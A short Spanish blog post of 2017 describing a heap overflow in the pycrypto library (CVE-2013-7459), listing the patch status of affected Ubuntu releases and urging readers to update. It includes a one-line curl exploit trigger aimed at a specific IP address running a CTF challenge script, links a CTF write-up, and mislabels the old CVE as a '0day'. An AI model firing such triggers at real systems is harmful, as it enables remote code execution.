lunes, 20 de febrero de 2017

Python Crypto Regression Vulnerability --> 0day 20-02-17



Amigos empezamos el día con esta vulnerabilidad perteneciente a un desbordamiento de búfer basado en heap en la función ALGnew en block_templace.c en Python Cryptography Toolkit (aka pycrypto).

Esta permite a los atacantes remotos ejecutar código arbitrario en el parámetro iv creado para Cryptmsg.py.

CLAVE CVE


CVE-2013-7459



SISTEMAS VULNERABLES



Ubuntu 12.04 LTS (Precise Pangolin):needs-triage
Ubuntu 14.04 LTS (Trusty Tahr):released (2.6.1-4ubuntu0.1)
Ubuntu Touch 15.04:pending (2.6.1-5ubuntu0.1)
Ubuntu Core 15.04:pending (2.6.1-5ubuntu0.1)
Ubuntu 16.04 LTS (Xenial Xerus):released (2.6.1-6ubuntu0.16.04.1)
Ubuntu 16.10 (Yakkety Yak):released (2.6.1-6ubuntu0.16.10.2)
Ubuntu 17.04 (Zesty Zapus):not-affected (2.6.1-7)


Amigos  actualizar nuestros sistemas.

EXPLOIT:


curl "http://136.243.194.56:8000/cgi-bin/cryptmsg.py?what=enc&msg
=AAAAAAAAAAAAAAAA&key=AAAAAAAAAAAAAAAA&mode=42&iv
=AAAAAAAAAAAAAAAA"

EL EXPLOIT BIEN EXPLICADO:
https://pony7.fr/ctf:public:32c3:cryptmsg

Saludos

Li. Rodolfo H. Baz
www.rodlfohbaz.net

3 comentarios:

  1. y el exploit? para poder analizar?

    ResponderEliminar
    Respuestas
    1. Este comentario ha sido eliminado por el autor.

      Eliminar
    2. MI ESTIMADO AQUÍ ENContraras el EXPLOIT: https://pony7.fr/ctf:public:32c3:cryptmsg EN SI YA LO PUSE EN EL ARTICULO

      Eliminar

Crowdstrike -> Solución de errores de actualización de CrowdStrike con BitLocker habilitado

En este pequeño articulo ver como componer el problema de CROWDSTRIKE cuando esta habilitado el BITLOCKER, cabe resaltar que puede ser una e...